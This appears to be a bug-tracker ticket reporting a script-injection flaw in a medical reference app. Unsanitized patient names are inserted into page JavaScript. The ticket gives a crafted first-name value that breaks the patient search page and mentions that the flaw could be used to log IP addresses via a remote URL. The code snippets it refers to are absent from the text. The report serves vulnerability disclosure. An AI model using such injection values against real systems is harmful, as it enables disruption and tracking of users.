Type: Technical task
Affects Version/s: None
Fix Version/s: None
Sprint:Ref App 2.11 Release Sprint 3, Ref App 2.12 Priorities
Patient names aren't sanitized before being injected into code. This is a serious vulnerability; a malicious user could do this (only one of the scenarios that I could think of). These are also steps to reproduce:
1. Login to devtest02 or another recent installation
2. Create a new patient. Fill in all other fields normally, but set the first name to |"); Bob| (take everything between the |'s)
This is only one terrible thing one could do with this vulnerability. A person could also, conceivably, log user's IP addresses by sending a request to a remote URL. The only limit is the 50-character limit on the field.
Here's how it breaks the patient search page:
Normally, the page generates a script like this to add each patient:
However, since the full name isn't sanitized before being put into the code, we can craft a string that makes this happen:
Which isn't valid JS, and causes a Uncaught SyntaxError: Unexpected token ). This then breaks the entire patient search page.